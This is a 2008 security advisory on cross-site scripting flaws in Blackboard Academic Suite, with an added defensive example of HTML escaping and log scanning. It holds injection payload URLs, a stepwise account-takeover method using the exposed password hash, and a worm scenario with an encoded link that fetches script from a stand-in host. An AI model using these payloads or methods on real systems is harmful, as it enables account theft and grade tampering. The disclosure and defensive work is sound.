
blackboard-xss.txt

Posted Mar 26, 2008
Authored by Knight4vn

Blackboard versions 7.x and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | a645dcc1193f7bfeb626eb7d7cae92f14e5c4bcf9b67413688401878b50d78d7

////////////////////////////////////////////////////////////////////////////////
//Note:
//The full version of this report (in pdf format) is available at my blog:
//http://www.secskill.wordpress.com
// OR :
//http://www.scribd.com/doc/2363025/Blackboard-Academic-Suite-Multiple-XSS-Vulnerabilities-
////////////////////////////////////////////////////////////////////////////////


Blackboard Academic Suite Multiple Cross Site Scripting Vulnerabilities

Background:
Blackboard Academic Suite is an enterprise software solution that provides interactive learning and course-management capabilities for educational institutions.
Many institutions currently use Blackboard, among them Princeton, Yale, Duke, the University of Pennsylvania and the University of Texas at Austin …

Platforms Affected:
All versions (7.x and lower)

Description: By combining these XSS flaws with conditions that already exist in the Blackboard system,
an attacker can log in with an instructor's identity and do everything that instructor can (change grades, edit the content of online tests, …).

Vulnerable paths:
1/
http://site.edu/webapps/blackboard/execute/viewCatalog?type=Course&searchText="><script>alert('xss')</script>

2/Add announcement page: (instructor access only)
http://site.edu/bin/common/announcement.pl?action=ADD&course_id=_137839_1&render_type=EDITABLE&context=course

<input type="text" name="data__announcements___pk1_pk2__subject" value="<script>alert('worm activated!')</script>" />

Author: Duong Thanh - Knight4vn
(knightvn (at) gmail.com or knight4vn (at) yahoo.com )

Vulnerabilities discovered: 12/2007

Vendor and Universities Contacted: 02/2008

Public disclosure: 03/2008


PART I - COMPROMISING USER’S ACCOUNT
Explanation:
When a user who already has a Blackboard session clicks the link (sent, for example, by email), the exploit code executes automatically in that session. The user's email address is changed without their noticing; at the same time their current email address, first and last name, and current encrypted password (all taken from the User Information page) are logged by a remote server-side script.

The attacker reads all of this information from the log file.
He then requests a new password through the Lost Password form; because the account's email address now points at him, the new password is delivered to his mailbox.
With the victim's username and the new password the attacker has full permission on the account and can do whatever he wants with it.
When he is finished, he changes the user's email address and encrypted password back to their original values.


Analysis:
Although the exploit code could change the victim's password directly, it should not: the victim would no longer be able to log in and would immediately realise that something is wrong.

Edit Personal Info page:
http://site.edu/webapps/blackboard/execute/editUser?context=self_modify

Blackboard writes the user's encrypted password (in fact an MD5 digest, see the md5.js step below) into a hidden field of the Edit Personal Info page:

<INPUT TYPE="hidden" NAME="password" VALUE="CE0BFD15059B68D67688884D7A3D3E8C">

Hence any script running in the victim's session can read the current user's encrypted password without difficulty.


On this page:
http://site.edu/bin/common/user.pl?action=MODIFY&context=PASSWORD
Blackboard calls a function in '/javascript/md5.js' to hash the password on the client side before the form is submitted to '/webapps/blackboard/execute/editUser'. The server therefore accepts an already-hashed value as the new password, so the digest alone is enough to set a password: possession of the hash is equivalent to possession of the password. The attacker uses this to restore the victim's encrypted password to its original value once he is done.
As a result, the victim's account is completely compromised without his or her awareness.

Proof-of-concept:
Steal.js



PART II - MAKING A WEB-BASED WORM

Just imagine what would happen if someone used these holes to create a JavaScript-based worm. Think about this scenario for a second:
A black-hat writes a worm and sends it to one person (for example, an instructor).
The instructor is infected immediately. The worm uses his identity to spread by sending itself to every student currently enrolled in his courses. The students are infected in turn; the worm uses their identities to send itself to all of their classmates and their other instructors… The combination of multiple XSS vulnerabilities lets the worm spread very fast.
During its propagation, the worm could log private user information (emails, names, grades…) and report it back to the attacker (for spamming purposes), or it could simply do whatever the attacker wants with each account.

ANALYSIS:
Blackboard does not filter the title of an Announcement:

<input type="text" name="data__announcements___pk1_pk2__subject" value="<script>alert('worm activated!')</script>" />

So this persistent XSS can be used to inject arbitrary script into the course page.
The announcement is posted on the course front page, so as soon as a student logs in
the malicious script runs at least once.


Students spread the worm by sending the infected link to their classmates
and their other instructors via Blackboard's Send Mail form.
Here is what an infected student is forced to send in the email.

Encoded Version:
Hi,
I don't understand today's online assignment. Would you mind helping me out?
http://site.edu/webapps/blackboard/execute/viewCatalog?type=Course&searchText=%22%3E%3C%73%63%72%69%70%74%20%73%72%63%20%3D%20%27%68%74%74%70%3A%2F%2F%65%76%69%6C%2F%77%6F%72%6D%2E%6A%73%27%3E%3C%2F%73%63%72%69%70%74%3E

Proof-Of-Concept: worm.js

Worm Features:
Logs all user information and sends it to the attacker.
Propagates through the Send Mail form and by creating announcements that carry hidden malicious script.
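The reflected searchText bug and the unfiltered announcement subject share one root cause: user-supplied text is written into HTML without escaping for the context it lands in. The following is an added example, not code from the advisory or from Blackboard: it percent-decodes the searchText parameter of a worm-style link, echoes it into a quoted attribute first raw and then escaped, and scans constructed access-log lines for requests whose decoded query parameters carry script. The link (encoded with straight quotes, %22 and %27), the page template, the host evil and the log lines are all constructed for the example.

```javascript
// Added example (not from the advisory or Blackboard): the reflected/stored
// XSS root cause, its fix, and a log check. All inputs are constructed.

// Worm-style link in the shape the advisory shows, with the payload
// percent-encoded using straight quotes (%22 and %27).
const WORM_LINK =
  "http://site.edu/webapps/blackboard/execute/viewCatalog?type=Course&searchText=" +
  "%22%3E%3C%73%63%72%69%70%74%20%73%72%63%20%3D%20%27%68%74%74%70%3A%2F%2F" +
  "%65%76%69%6C%2F%77%6F%72%6D%2E%6A%73%27%3E%3C%2F%73%63%72%69%70%74%3E";

// Percent-decode the reflected parameter the way the server sees it.
function searchTextOf(link) {
  return new URL(link).searchParams.get("searchText");
}

// Vulnerable rendering (assumed template): the search term is pasted straight
// into a double-quoted attribute, so a leading " closes the attribute and
// everything after the > becomes markup.
function renderCatalogUnsafe(searchText) {
  return `<input type="text" name="searchText" value="${searchText}">`;
}

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering. The same escaping, applied when the announcement
// subject is written into the course page, closes the stored variant too.
function renderCatalogSafe(searchText) {
  return `<input type="text" name="searchText" value="${escapeHtml(searchText)}">`;
}

// Tag scanner used to check rendered output for a live <script> element.
function hasInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed Common Log Format lines: a benign search, the worm link,
// and an announcement post.
const SAMPLE_LOG = [
  '10.0.0.5 - - [26/Mar/2008:10:01:02 -0500] "GET /webapps/blackboard/execute/viewCatalog?type=Course&searchText=networks HTTP/1.1" 200 5120',
  '10.0.0.9 - - [26/Mar/2008:10:01:07 -0500] "GET ' + WORM_LINK.replace("http://site.edu", "") + ' HTTP/1.1" 200 5300',
  '10.0.0.9 - - [26/Mar/2008:10:02:11 -0500] "POST /bin/common/announcement.pl?action=ADD&course_id=_137839_1 HTTP/1.1" 302 0',
];

// Decode every query parameter of each request and flag script-bearing values.
// Decoding first matters: a raw match on "<script" would miss %3Cscript.
function flagXssRequests(lines) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|POST) (\S+) HTTP\//);
    if (!m) continue;
    const url = new URL(m[1], "http://site.edu");
    for (const [param, value] of url.searchParams) {
      if (/<\s*script|javascript:|\bon\w+\s*=/i.test(value)) {
        hits.push({ path: url.pathname, param, value });
      }
    }
  }
  return hits;
}

function main() {
  const payload = searchTextOf(WORM_LINK);
  console.log("decoded:", payload);
  console.log("unsafe has script:", hasInjectedScript(renderCatalogUnsafe(payload)));
  console.log("safe has script:  ", hasInjectedScript(renderCatalogSafe(payload)));
  console.log("log hits:", flagXssRequests(SAMPLE_LOG));
}

main();
```

The log check is a triage aid, not a detector of exploitation: it only sees GET parameters, so the stored payload posted through announcement.pl shows up as a POST with no flagged value, and a request can be flagged without the page ever having rendered it. The fix is the escaping in renderCatalogSafe, applied at every point where untrusted text meets HTML.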

CONCLUSION:
It is possible for an attacker to silently steal an instructor's password and change grades. In the worst case, an XSS worm could take the entire system down, as the MySpace worm showed. The consequences are foreseeable.